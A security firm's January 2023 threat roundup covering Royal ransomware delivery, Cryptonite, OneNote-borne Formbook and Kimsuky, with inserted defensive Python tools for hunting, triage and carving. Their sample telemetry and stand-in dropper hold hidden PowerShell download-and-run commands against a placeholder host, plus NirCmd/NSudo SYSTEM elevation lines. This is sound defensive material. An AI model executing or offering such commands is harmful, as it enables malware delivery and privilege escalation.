January 26, 2023

Four Cybersecurity Threats Affecting Businesses in January 2023


Cybersecurity threats are increasing rapidly. Threat groups introduced new ways to proliferate ransomware at the end of 2022 into the new year, including trojanized OneNote documents and new toolkit infrastructures. As a result, companies need to be more aware of potential deficiencies in their overall cybersecurity strategy. Threat hunt queries, offered as part of Marcum Technology’s Security Operations Center (SOC) services, are key to identifying potential threats in an organization’s environment.

Below are the top four threats that emerged over the past month.

DEV-0569 Develops New Ways to Deliver Royal Ransomware

Microsoft is tracking DEV-0569, a threat group that has been observed deploying Royal ransomware since September 2022. Beyond spam email, the group's delivery strategy relies on blending into channels well outside the work inbox: it abuses contact forms on company websites, plants installer files on legitimate-looking download sites, and buys Google Ads for malvertising. Signed binaries carrying encrypted malware payloads are a hallmark of the group's activity, and it uses the NSudo utility in attempts to disable antivirus software.

While the group handles much of its own delivery, it also buys phishing-as-a-service from other criminal operators. DEV-0569 additionally distributes virtual hard disk (VHD) files, a disk image format that stores the entire contents of a drive. In a recent campaign the group abused the target company's own contact forms, posing as a financial authority; because the resulting message is generated by the company's own website rather than arriving from an external sender, it bypasses email protections and appears trustworthy. When an employee responded, the group replied with a message containing a link to BATLOADER hosted on GitHub, OneDrive, or another abused legitimate service.

Those installers launch a PowerShell script that, among other things, downloads the NirCmd command-line utility from NirSoft; if that succeeds, the attacker uses it to elevate from local administrator to SYSTEM. From there additional executables are delivered, including the Gozi banking trojan (delivered encrypted) and Vidar Stealer, which uses Telegram for command and control. BATLOADER, a downloader, replaced ZLoader, which DEV-0569 stopped using in early 2022: unlike ZLoader, BATLOADER can run PowerShell scripts as well as commands, and it uses Gpg4win to decrypt its payloads. The group has recently used it to deploy Royal ransomware.
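The chain above (installer launches PowerShell, PowerShell fetches NirCmd, NirCmd reaches SYSTEM, NSudo and gpg do the rest) is what a threat hunt should look for in process-creation telemetry. The following is an added example and is not Microsoft's or Marcum Technology's hunting query: it runs a few rules over Sysmon-style process events (fields Image, ParentImage, CommandLine) and surfaces hosts where more than one stage fires. The switch names are the documented ones for NirCmd (elevate, runassystem) and NSudo (-U:S, -U:T); the sample events are constructed and are not real DEV-0569 telemetry.

```python
"""Hunt for DEV-0569-style tooling in process-creation telemetry (added example)."""
import re
from collections import defaultdict
from typing import Dict, List

# Typical drop locations for downloaded payloads
DROP_DIRS = re.compile(r"\\(temp|appdata|programdata|downloads|public)\\", re.I)
# PowerShell hiding its window, taking encoded input, or downloading
PS_DOWNLOAD = re.compile(
    r"(-w(indowstyle)?\s+hidden|-e(nc|ncodedcommand)?\s|downloadstring|invoke-webrequest|\biwr\b|start-bitstransfer)",
    re.I)


def _base(path: str) -> str:
    """Lower-cased file name of a Windows path (either slash style)."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def match_rules(event: Dict[str, str]) -> List[str]:
    """Return the names of every rule the event matches (empty list if none)."""
    img = _base(event.get("Image", ""))
    parent = _base(event.get("ParentImage", ""))
    cmd = event.get("CommandLine", "")
    hits = []
    # Installer (MSI / setup stub) spawning a hidden or downloading PowerShell
    if img in ("powershell.exe", "pwsh.exe") and re.search(r"(msiexec|setup|install)", parent) \
            and PS_DOWNLOAD.search(cmd):
        hits.append("installer_spawns_powershell")
    # NirCmd used to elevate or to run something as SYSTEM
    if img in ("nircmd.exe", "nircmdc.exe") and re.search(r"\b(elevate|runassystem)\b", cmd, re.I):
        hits.append("nircmd_to_system")
    # NSudo launching a process as SYSTEM (-U:S) or TrustedInstaller (-U:T)
    if img.startswith("nsudo") and re.search(r"-U:[ST]\b", cmd, re.I):
        hits.append("nsudo_elevated")
    # gpg decrypting a file that lives in a drop directory
    if img in ("gpg.exe", "gpg2.exe") and re.search(r"(--decrypt\b|\s-d\s)", cmd) and DROP_DIRS.search(cmd):
        hits.append("gpg_decrypt_dropped_payload")
    return hits


def hunt(events: List[Dict[str, str]]) -> Dict[str, List[str]]:
    """Map host -> sorted distinct rules that fired on it; hosts with no hits are omitted."""
    per_host = defaultdict(set)
    for ev in events:
        for rule in match_rules(ev):
            per_host[ev.get("Host", "?")].add(rule)
    return {host: sorted(rules) for host, rules in per_host.items()}


def flagged_hosts(events: List[Dict[str, str]], min_rules: int = 2) -> List[str]:
    """Hosts on which at least min_rules distinct stages of the chain were seen."""
    return sorted(h for h, rules in hunt(events).items() if len(rules) >= min_rules)


SAMPLE_EVENTS = [  # constructed telemetry, not real logs
    {"Host": "WS-014", "ParentImage": r"C:\Windows\System32\msiexec.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r'powershell.exe -w hidden -c "iwr https://example.invalid/n.zip -OutFile $env:TEMP\n.zip"'},
    {"Host": "WS-014", "ParentImage": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "Image": r"C:\Users\jdoe\AppData\Local\Temp\nircmd.exe",
     "CommandLine": r'nircmd.exe elevate cmd.exe /c "nircmd.exe runassystem C:\Users\jdoe\AppData\Local\Temp\st.exe"'},
    {"Host": "WS-014", "ParentImage": r"C:\Windows\System32\cmd.exe",
     "Image": r"C:\Program Files (x86)\GnuPG\bin\gpg.exe",
     "CommandLine": r"gpg.exe --batch --passphrase 1234 --decrypt -o C:\Users\Public\payload.exe C:\Users\Public\payload.gpg"},
    {"Host": "WS-022", "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"powershell.exe -NoProfile -File C:\Scripts\inventory.ps1"},
]

if __name__ == "__main__":
    for host, rules in hunt(SAMPLE_EVENTS).items():
        print(host, rules)
    print("flagged:", flagged_hosts(SAMPLE_EVENTS))  # flagged: ['WS-014']
```

The per-host correlation matters more than any single rule: NirCmd and gpg both have legitimate administrative uses, but an installer-spawned downloading PowerShell followed by a NirCmd elevation and a gpg decrypt in a user-writable directory on the same host is the sequence described above, not routine administration.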

Cryptonite Ransomware

This Cryptonite (not the Chaos ransomware variant of the same name) is written in Python and distributed as free and open-source software (FOSS), so anyone who can download it can deploy it. A would-be operator only has to configure it by running the bundled exeGen Python script, which opens a GUI for setting the Bitcoin wallet address, the contact email address victims must use to obtain a decryption key, and the directories to leave unencrypted; no source editing or recompiling is required. The operator also needs a server to receive data from victims' devices: a basic Python web server backed by a SQLite database.

The built sample is packaged with PyInstaller, which bundles the Python interpreter and dependencies into a single executable that unpacks into a randomly named folder on the victim's computer, so the malware runs whether or not Python is installed. It then checks for an active network connection and throws an error if there is none. Once connected, it encrypts the device's files with Fernet (the Python cryptography library's recipe: AES-128 in CBC mode with an HMAC-SHA256 tag) and appends ".cryptn8" to the file names. When it finishes, it sends the victim's information to the server and displays a ransom window explaining how to obtain the key to unlock the system.
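Because Cryptonite uses Fernet, every encrypted file is a Fernet token with a public layout, and that layout is useful to a responder. The following is an added example, not Cryptonite's code and not a decryptor: it parses a .cryptn8 file as a Fernet token, which yields the time each file was encrypted, and, if a candidate 32-byte key turns up (in process memory, the operator's builder configuration or a seized server database), verifies the token's HMAC with the key's signing half, so the key can be confirmed before any decryption attempt. It uses only the standard library; actual decryption needs an AES implementation such as the `cryptography` package. The sample key and token are constructed by hand to the Fernet layout and are not real Cryptonite artifacts.

```python
"""Triage of Fernet-encrypted (.cryptn8) files (added example, not a decryptor)."""
import base64
import hashlib
import hmac
import os
import struct
from datetime import datetime, timezone
from typing import Dict, List, Optional

# Fernet token: base64url( 0x80 | timestamp(8, big-endian) | IV(16) | AES-128-CBC ciphertext | HMAC-SHA256(32) )
FERNET_VERSION = 0x80
HEADER_LEN = 1 + 8 + 16   # version, timestamp, IV
HMAC_LEN = 32
EXT = ".cryptn8"          # extension the article reports Cryptonite appends


def parse_fernet_token(token: bytes) -> Optional[Dict]:
    """Split a token into its fields; None if it is not structurally a Fernet token."""
    try:
        raw = base64.urlsafe_b64decode(token)
    except (ValueError, TypeError):
        return None
    if len(raw) < HEADER_LEN + HMAC_LEN + 16 or raw[0] != FERNET_VERSION:
        return None
    body = raw[HEADER_LEN:-HMAC_LEN]
    if len(body) % 16:      # CBC with PKCS7 padding: ciphertext is a multiple of the block size
        return None
    ts = struct.unpack(">Q", raw[1:9])[0]
    try:
        when = datetime.fromtimestamp(ts, tz=timezone.utc).isoformat()
    except (OverflowError, OSError, ValueError):
        when = None
    return {"timestamp": ts, "encrypted_at": when, "iv": raw[9:HEADER_LEN],
            "ciphertext": body, "hmac": raw[-HMAC_LEN:], "signed": raw[:-HMAC_LEN]}


def key_matches(token: bytes, candidate_key: bytes) -> bool:
    """True if the candidate Fernet key (32 bytes, base64url) authenticates the token's HMAC."""
    fields = parse_fernet_token(token)
    try:
        key = base64.urlsafe_b64decode(candidate_key)
    except (ValueError, TypeError):
        return False
    if fields is None or len(key) != 32:
        return False
    signing_key = key[:16]  # Fernet: first 16 bytes sign, last 16 encrypt
    expected = hmac.new(signing_key, fields["signed"], hashlib.sha256).digest()
    return hmac.compare_digest(expected, fields["hmac"])


def triage_directory(root: str) -> List[Dict]:
    """List every .cryptn8 file under root, whether it parses, and when it was encrypted."""
    report = []
    for dirpath, _, names in os.walk(root):
        for name in names:
            if name.endswith(EXT):
                path = os.path.join(dirpath, name)
                with open(path, "rb") as fh:
                    fields = parse_fernet_token(fh.read())
                report.append({"path": path, "fernet": fields is not None,
                               "encrypted_at": fields["encrypted_at"] if fields else None})
    return report


# Constructed sample key and token (not a real Cryptonite key). The ciphertext bytes are
# filler: without AES only the layout and the HMAC need to be right for the parser and key check.
SAMPLE_KEY = base64.urlsafe_b64encode(bytes(range(32)))
WRONG_KEY = base64.urlsafe_b64encode(bytes(32))
_ts = 1670284800                                   # 2022-12-06T00:00:00Z, constructed
_signed = bytes([FERNET_VERSION]) + struct.pack(">Q", _ts) + bytes(16) + bytes(32)
SAMPLE_TOKEN = base64.urlsafe_b64encode(
    _signed + hmac.new(bytes(range(16)), _signed, hashlib.sha256).digest())

if __name__ == "__main__":
    print(parse_fernet_token(SAMPLE_TOKEN)["encrypted_at"])                        # 2022-12-06T00:00:00+00:00
    print(key_matches(SAMPLE_TOKEN, SAMPLE_KEY), key_matches(SAMPLE_TOKEN, WRONG_KEY))  # True False
```

Two practical consequences: the embedded timestamps give a per-file encryption timeline without relying on filesystem metadata the malware may have disturbed, and a key candidate can be ruled in or out in constant time per file, which is what you want before spending a recovery effort on a key pulled from memory.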

Trojanized OneNote Document

Researchers recently uncovered threat actors using a OneNote document to deliver Formbook, an information-stealing trojan sold as malware-as-a-service on an underground hacking forum since mid-2016. Formbook can steal data from various web browsers and other applications, and it also has keylogging and screenshot capabilities. One sample, observed on December 6, 2022, arrived as a spam email carrying a OneNote attachment with a .one extension. Opening the attachment displays an image lure bearing the words 'View Document'. Clicking it executes an embedded Windows Script File (WSF), and OneNote shows a warning that a file is being opened from the OneNote application. If the user dismisses the warning and clicks 'OK', the malicious behavior begins: the WSF runs PowerShell commands that download and execute two files. The first is a decoy OneNote document, launched first to mask the download of the second. The second is an executable, the Formbook payload.
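The embedded WSF is stored inside the .one file in a documented structure, so it can be pulled out and read without opening the attachment in OneNote. The following is an added example, not the article's or any vendor's tool: it scans a .one file for FileDataStoreObject records (the MS-ONESTORE layout: a 16-byte header GUID, an 8-byte little-endian length, 12 bytes of unused/reserved fields, the file data, then a 16-byte footer GUID), carves each embedded object, and guesses its type so that scripts and executables are examined first. The sample document is constructed by hand to that layout, and the stand-in WSF only imitates the shape of a PowerShell launcher; it is not the real dropper.

```python
"""Carve embedded files out of a OneNote (.one) document for offline triage (added example)."""
import struct
from typing import Dict, List

ONE_MAGIC = bytes.fromhex("e4525c7b8cd8a74daeb15378d02996d3")    # .one file header GUID {7B5C52E4-D88C-4DA7-AEB1-5378D02996D3}
FDSO_HEADER = bytes.fromhex("e716e3bd65261145a4c48d4d0b7a9eac")  # FileDataStoreObject guidHeader {BDE316E7-2665-4511-A4C4-8D4D0B7A9EAC}
FDSO_FOOTER = bytes.fromhex("22a7fb71790f0b4abb13899256426b24")  # FileDataStoreObject guidFooter {71FBA722-0F79-4A0B-BB13-899256426B24}
FDSO_META_LEN = 8 + 4 + 8  # cbLength, unused, reserved


def is_onenote(data: bytes) -> bool:
    return data.startswith(ONE_MAGIC)


def sniff(blob: bytes) -> str:
    """Cheap content-based type guess for a carved object."""
    head = blob[:4096]
    low = head.lower()
    if head.startswith(b"MZ"):
        return "pe"
    if head.startswith(b"\x89PNG"):
        return "png"
    if head.startswith(b"\xff\xd8"):
        return "jpeg"
    if head.startswith(b"%PDF"):
        return "pdf"
    if b"<job" in low or (b"<script" in low and b"language" in low):
        return "wsf/hta script"
    if b"wscript" in low or b"createobject" in low or b"powershell" in low:
        return "vbs/js/ps script"
    return "unknown"


def carve_embedded_files(data: bytes) -> List[Dict]:
    """Return every FileDataStoreObject found: offset, size, type guess, footer check, bytes."""
    found, pos = [], 0
    while (idx := data.find(FDSO_HEADER, pos)) != -1:
        meta = idx + len(FDSO_HEADER)
        start = meta + FDSO_META_LEN
        if start > len(data):
            break
        (cb_length,) = struct.unpack_from("<Q", data, meta)
        end = start + cb_length
        if end > len(data):       # bogus or truncated length: skip this hit, keep scanning
            pos = meta
            continue
        payload = data[start:end]
        found.append({"offset": idx, "size": cb_length, "kind": sniff(payload),
                      "footer_ok": data[end:end + len(FDSO_FOOTER)] == FDSO_FOOTER, "data": payload})
        pos = end
    return found


def scripts_in(data: bytes) -> List[Dict]:
    """Only the carved objects that look like scripts or executables: what to read first."""
    return [o for o in carve_embedded_files(data) if o["kind"] in ("pe", "wsf/hta script", "vbs/js/ps script")]


# --- constructed sample document (not a real malicious attachment) -------------------------
def _fdso(payload: bytes) -> bytes:
    return FDSO_HEADER + struct.pack("<Q", len(payload)) + bytes(4) + bytes(8) + payload + FDSO_FOOTER


SAMPLE_WSF = (b'<job id="run"><script language="VBScript">\r\n'
              b"' stand-in for the embedded launcher; not the real dropper\r\n"
              b'CreateObject("WScript.Shell").Run "powershell -w hidden -c '
              b'Start-Process decoy.one; iwr http://example.invalid/f.exe -OutFile f.exe; .\\f.exe"\r\n'
              b"</script></job>")
SAMPLE_PNG = b"\x89PNG\r\n\x1a\n" + bytes(64)   # stand-in for the 'View Document' lure image
SAMPLE_ONE = ONE_MAGIC + bytes(128) + _fdso(SAMPLE_PNG) + bytes(32) + _fdso(SAMPLE_WSF) + bytes(16)

if __name__ == "__main__":
    print("onenote:", is_onenote(SAMPLE_ONE))
    for obj in carve_embedded_files(SAMPLE_ONE):
        print(obj["offset"], obj["size"], obj["kind"], obj["footer_ok"])
    print(scripts_in(SAMPLE_ONE)[0]["data"].decode())
```

Carving by header GUID rather than parsing the full OneNote object tree is deliberate: it works on damaged or deliberately malformed files, and a mismatched footer or an out-of-range length is itself worth noting during triage.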

Kimsuky Threat Group

The Cybereason Nocturnus Team has discovered a new toolkit infrastructure used by Kimsuky, a threat group that has operated on behalf of the North Korean regime since 2012. After a thorough assessment of the new infrastructure and analysis of the patterns in it, the team identified two previously unknown components: the KGH spyware suite, a modular toolset likely used in recent espionage operations, and the CSPY downloader.

US-CERT published a report summarizing Kimsuky's recent activities and describing the group's TTPs and infrastructure. There are intriguing parallels between the earlier Kimsuky malware and servers and the newly identified malware and infrastructure, as well as significant behavioral and coding similarities between the new variants and previously documented Kimsuky malware and TTPs. The threat actors clearly tried to stay under the radar by adopting anti-forensics and anti-analysis measures, including backdating the samples' creation and compilation timestamps to 2016, code obfuscation, and anti-VM and anti-debugging techniques. CISA and the FBI advised individuals and organizations matching this target profile to strengthen their defenses and adopt a heightened state of awareness. Particularly important mitigations include multi-factor authentication, user awareness training, and safeguards against spear-phishing.

Interested in learning more about identifying potential threats to your organization and how Marcum Technology can help? View all of our cybersecurity offerings here.